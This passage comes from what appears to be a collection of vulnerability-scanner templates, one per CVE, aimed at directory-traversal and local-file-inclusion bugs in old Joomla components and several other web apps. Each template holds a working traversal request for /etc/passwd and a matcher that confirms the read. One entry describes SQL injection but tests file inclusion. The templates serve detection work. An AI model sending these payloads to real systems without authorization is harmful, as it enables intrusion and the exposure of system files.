regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | # Enhanced by mp on 2022/02/13 30 | -------------------------------------------------------------------------------- /CVE-2010-1308.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1308 2 | 3 | info: 4 | name: Joomla! 
Component SVMap 1.1.1 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12066 10 | - https://www.cvedetails.com/cve/CVE-2010-1308 11 | - http://www.vupen.com/english/advisories/2010/0809 12 | remediation: Upgrade to a supported version. 13 | classification: 14 | cve-id: CVE-2010-1308 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | # Enhanced by mp on 2022/02/14 30 | -------------------------------------------------------------------------------- /CVE-2010-1345.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1345 2 | 3 | info: 4 | name: Joomla! Component Cookex Agency CKForms - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/15453 10 | - https://www.cvedetails.com/cve/CVE-2010-1345 11 | - http://www.exploit-db.com/exploits/11785 12 | remediation: Upgrade to a supported version. 
13 | classification: 14 | cve-id: CVE-2010-1345 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | # Enhanced by mp on 2022/02/14 30 | -------------------------------------------------------------------------------- /CVE-2010-1353.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1353 2 | 3 | info: 4 | name: Joomla! Component LoginBox - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12068 10 | - https://www.cvedetails.com/cve/CVE-2010-1353 11 | - http://web.archive.org/web/20210121195246/https://www.securityfocus.com/bid/39212/ 12 | - http://www.vupen.com/english/advisories/2010/0808 13 | classification: 14 | cve-id: CVE-2010-1353 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | 30 | # Enhanced by mp on 2022/03/30 31 | -------------------------------------------------------------------------------- /CVE-2010-1470.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1470 2 | 3 | info: 4 | name: Joomla! 
Component Web TV 1.0 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12166 10 | - https://www.cvedetails.com/cve/CVE-2010-1470 11 | - http://secunia.com/advisories/39405 12 | remediation: Upgrade to a supported version. 13 | classification: 14 | cve-id: CVE-2010-1470 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | # Enhanced by mp on 2022/02/14 30 | -------------------------------------------------------------------------------- /CVE-2010-1471.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1471 2 | 3 | info: 4 | name: Joomla! Component Address Book 1.5.0 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/12170 10 | - https://www.cvedetails.com/cve/CVE-2010-1471 11 | - http://www.vupen.com/english/advisories/2010/0862 12 | classification: 13 | cve-id: CVE-2010-1471 14 | tags: cve,cve2010,joomla,lfi 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00" 20 | matchers-condition: and 21 | matchers: 22 | - type: regex 23 | regex: 24 | - "root:.*:0:0:" 25 | - type: status 26 | status: 27 | - 200 28 | # Enhanced by mp on 2022/02/14 29 | -------------------------------------------------------------------------------- /CVE-2010-1474.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1474 2 | 3 | info: 4 | name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/12182 10 | - https://www.cvedetails.com/cve/CVE-2010-1474 11 | - http://secunia.com/advisories/39388 12 | classification: 13 | cve-id: CVE-2010-1474 14 | tags: cve,cve2010,joomla,lfi 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00" 20 | matchers-condition: and 21 | matchers: 22 | - type: regex 23 | regex: 24 | - "root:.*:0:0:" 25 | - type: status 26 | status: 27 | - 200 28 | 29 | # Enhanced by mp on 2022/03/30 30 | -------------------------------------------------------------------------------- /CVE-2010-1475.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1475 2 | 3 | info: 4 | name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/12147 10 | - https://www.cvedetails.com/cve/CVE-2010-1475 11 | - http://secunia.com/advisories/39285 12 | classification: 13 | cve-id: CVE-2010-1475 14 | tags: cve,cve2010,joomla,lfi 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00" 20 | matchers-condition: and 21 | matchers: 22 | - type: regex 23 | regex: 24 | - "root:.*:0:0:" 25 | - type: status 26 | status: 27 | - 200 28 | 29 | # Enhanced by mp on 2022/03/24 30 | -------------------------------------------------------------------------------- /CVE-2010-1494.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1494 2 | 3 | info: 4 | name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12113 10 | - https://www.cvedetails.com/cve/CVE-2010-1494 11 | - http://www.exploit-db.com/exploits/12113 12 | remediation: Upgrade to a supported version. 13 | classification: 14 | cve-id: CVE-2010-1494 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | # Enhanced by mp on 2022/02/14 30 | -------------------------------------------------------------------------------- /CVE-2010-1531.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1531 2 | 3 | info: 4 | name: Joomla! 
Component redSHOP 1.0 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12054 10 | - https://www.cvedetails.com/cve/CVE-2010-1531 11 | - http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt 12 | remediation: Upgrade to a supported version. 13 | classification: 14 | cve-id: CVE-2010-1531 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | # Enhanced by mp on 2022/02/14 30 | -------------------------------------------------------------------------------- /CVE-2010-1533.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1533 2 | 3 | info: 4 | name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12142 10 | - https://www.cvedetails.com/cve/CVE-2010-1533 11 | - http://secunia.com/advisories/39258 12 | remediation: Upgrade to a supported version. 
13 | classification: 14 | cve-id: CVE-2010-1533 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | # Enhanced by mp on 2022/02/15 30 | -------------------------------------------------------------------------------- /CVE-2010-1535.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1535 2 | 3 | info: 4 | name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12151 10 | - https://www.cvedetails.com/cve/CVE-2010-1535 11 | - http://secunia.com/advisories/39254 12 | classification: 13 | cve-id: CVE-2010-1535 14 | tags: cve,cve2010,joomla,lfi 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00" 20 | matchers-condition: and 21 | matchers: 22 | - type: regex 23 | regex: 24 | - "root:.*:0:0:" 25 | - type: status 26 | status: 27 | - 200 28 | 29 | # Enhanced by mp on 2022/03/24 30 | -------------------------------------------------------------------------------- /CVE-2010-1540.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1540 2 | 3 | info: 4 | name: Joomla! 
Component com_blog - Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. 8 | reference: 9 | - https://www.exploit-db.com/exploits/11625 10 | - https://www.cvedetails.com/cve/CVE-2010-1540 11 | - http://secunia.com/advisories/38777 12 | - http://web.archive.org/web/20210121194559/https://www.securityfocus.com/bid/38530/ 13 | classification: 14 | cve-id: CVE-2010-1540 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | 30 | # Enhanced by mp on 2022/03/06 31 | -------------------------------------------------------------------------------- /CVE-2010-1601.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1601 2 | 3 | info: 4 | name: Joomla! Component JA Comment - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/12236 10 | - https://www.cvedetails.com/cve/CVE-2010-1601 11 | - http://secunia.com/advisories/39472 12 | - http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txt 13 | classification: 14 | cve-id: CVE-2010-1601 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | 30 | # Enhanced by mp on 2022/03/24 31 | -------------------------------------------------------------------------------- /CVE-2010-1602.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1602 2 | 3 | info: 4 | name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/12283 10 | - https://www.cvedetails.com/cve/CVE-2010-1602 11 | - http://packetstormsecurity.org/1004-exploits/joomlazimbcomment-lfi.txt 12 | classification: 13 | cve-id: CVE-2010-1602 14 | tags: cve,cve2010,joomla,lfi 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00" 20 | matchers-condition: and 21 | matchers: 22 | - type: regex 23 | regex: 24 | - "root:.*:0:0:" 25 | - type: status 26 | status: 27 | - 200 28 | 29 | # Enhanced by mp on 2022/03/30 30 | -------------------------------------------------------------------------------- /CVE-2010-1714.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1714 2 | 3 | info: 4 | name: Joomla! Component Arcade Games 1.0 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/12168 10 | - https://www.cvedetails.com/cve/CVE-2010-1714 11 | - http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt 12 | - http://secunia.com/advisories/39413 13 | classification: 14 | cve-id: CVE-2010-1714 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | 30 | # Enhanced by mp on 2022/02/28 31 | -------------------------------------------------------------------------------- /CVE-2010-1719.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1719 2 | 3 | info: 4 | name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/12233 10 | - https://www.cvedetails.com/cve/CVE-2010-1719 11 | - http://www.exploit-db.com/exploits/12233 12 | classification: 13 | cve-id: CVE-2010-1719 14 | tags: cve,cve2010,joomla,lfi 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00" 20 | matchers-condition: and 21 | matchers: 22 | - type: regex 23 | regex: 24 | - "root:.*:0:0:" 25 | - type: status 26 | status: 27 | - 200 28 | 29 | # Enhanced by mp on 2022/03/01 30 | -------------------------------------------------------------------------------- /CVE-2010-1722.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1722 2 | 3 | info: 4 | name: Joomla! Component Online Market 2.x - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/12177 10 | - https://www.cvedetails.com/cve/CVE-2010-1722 11 | - http://secunia.com/advisories/39409 12 | - http://www.exploit-db.com/exploits/12177 13 | classification: 14 | cve-id: CVE-2010-1722 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | 30 | # Enhanced by mp on 2022/03/01 31 | -------------------------------------------------------------------------------- /CVE-2010-1723.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1723 2 | 3 | info: 4 | name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/12289 10 | - https://www.cvedetails.com/cve/CVE-2010-1723 11 | - http://secunia.com/advisories/39524 12 | classification: 13 | cve-id: CVE-2010-1723 14 | tags: cve,cve2010,joomla,lfi 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00" 20 | matchers-condition: and 21 | matchers: 22 | - type: regex 23 | regex: 24 | - "root:.*:0:0:" 25 | - type: status 26 | status: 27 | - 200 28 | 29 | # Enhanced by mp on 2022/03/01 30 | -------------------------------------------------------------------------------- /CVE-2010-1873.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1873 2 | 3 | info: 4 | name: Joomla! Component Jvehicles - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/11997 10 | - https://www.cvedetails.com/cve/CVE-2010-1873 11 | tags: cve,cve2010,joomla,lfi 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00" 17 | 18 | matchers-condition: and 19 | matchers: 20 | 21 | - type: regex 22 | regex: 23 | - "root:.*:0:0" 24 | 25 | - type: status 26 | status: 27 | - 200 -------------------------------------------------------------------------------- /CVE-2010-1956.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1956 2 | 3 | info: 4 | name: Joomla! 
Component Gadget Factory 1.0.0 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12285 10 | - https://www.cvedetails.com/cve/CVE-2010-1956 11 | - http://secunia.com/advisories/39522 12 | remediation: Upgrade to a supported version. 13 | classification: 14 | cve-id: CVE-2010-1956 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | regex: 25 | - "root:.*:0:0:" 26 | - type: status 27 | status: 28 | - 200 29 | # Enhanced by mp on 2022/02/15 30 | -------------------------------------------------------------------------------- /CVE-2010-1979.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-1979 2 | 3 | info: 4 | name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/12088 10 | - https://www.cvedetails.com/cve/CVE-2010-1979 11 | - http://secunia.com/advisories/39360 12 | remediation: Upgrade to a supported version. 
13 | classification: 14 | cve-id: CVE-2010-1979 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | 33 | # Enhanced by mp on 2022/02/17 34 | -------------------------------------------------------------------------------- /CVE-2010-4231.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-4231 2 | 3 | info: 4 | name: Camtron CMNC-200 IP Camera - Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory traversal attacks, allowing access to any file on the camera file system. 8 | reference: 9 | - https://nvd.nist.gov/vuln/detail/CVE-2010-4231 10 | - https://www.exploit-db.com/exploits/15505 11 | - https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt 12 | - http://www.exploit-db.com/exploits/15505/ 13 | remediation: Upgrade to a supported product version.
14 | classification: 15 | cve-id: CVE-2010-4231 16 | tags: cve,cve2010,iot,lfi,camera 17 | 18 | requests: 19 | - method: GET 20 | path: 21 | - "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd" 22 | 23 | matchers-condition: and 24 | matchers: 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | 33 | # Enhanced by mp on 2022/02/17 34 | -------------------------------------------------------------------------------- /CVE-2011-2744.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2011-2744 2 | 3 | info: 4 | name: Chyrp 2.x - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. 8 | reference: 9 | - https://www.exploit-db.com/exploits/35945 10 | - https://www.cvedetails.com/cve/CVE-2011-2744 11 | - http://www.openwall.com/lists/oss-security/2011/07/13/6 12 | - http://secunia.com/advisories/45184 13 | classification: 14 | cve-id: CVE-2011-2744 15 | tags: cve,cve2011,lfi,chyrp 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | 33 | # Enhanced by mp on 2022/02/18 34 | -------------------------------------------------------------------------------- /CVE-2012-0981.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2012-0981 2 | 3 | info: 4 | name: phpShowtime 2.0 - Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list 
arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/18435 10 | - https://www.cvedetails.com/cve/CVE-2012-0981 11 | - http://secunia.com/advisories/47802 12 | - http://www.exploit-db.com/exploits/18435 13 | classification: 14 | cve-id: CVE-2012-0981 15 | tags: cve,cve2012,lfi,phpshowtime 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | 33 | # Enhanced by mp on 2022/02/21 34 | -------------------------------------------------------------------------------- /CVE-2012-0996.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2012-0996 2 | 3 | info: 4 | name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI) 5 | author: daffainfo 6 | severity: high 7 | description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/36784 10 | - https://www.cvedetails.com/cve/CVE-2012-0996 11 | - https://www.htbridge.ch/advisory/HTB23071 12 | remediation: Upgrade to a supported version. 
13 | classification: 14 | cve-id: CVE-2012-0996 15 | tags: cve,cve2012,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | 33 | # Enhanced by mp on 2022/02/18 34 | -------------------------------------------------------------------------------- /CVE-2013-5979.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2013-5979 2 | 3 | info: 4 | name: Xibo 1.2.2/1.4.1 - Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/26955 10 | - https://nvd.nist.gov/vuln/detail/CVE-2013-5979 11 | - https://www.cvedetails.com/cve/CVE-2013-5979 12 | - https://bugs.launchpad.net/xibo/+bug/1093967 13 | classification: 14 | cve-id: CVE-2013-5979 15 | tags: cve,cve2013,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | 33 | # Enhanced by mp on 2022/02/24 34 | -------------------------------------------------------------------------------- /CVE-2014-10037.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2014-10037 2 | 3 | info: 4 | name: DomPHP 0.83 - Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in DomPHP 0.83 and earlier 
allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/30865 10 | - https://www.cvedetails.com/cve/CVE-2014-10037 11 | - https://nvd.nist.gov/vuln/detail/CVE-2014-10037 12 | - http://osvdb.org/show/osvdb/102204 13 | classification: 14 | cve-id: CVE-2014-10037 15 | tags: cve,cve2014,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | 33 | # Enhanced by mp on 2022/02/24 34 | -------------------------------------------------------------------------------- /CVE-2015-9480.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2015-9480 2 | 3 | info: 4 | name: WordPress RobotCPA 5 - Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter. 
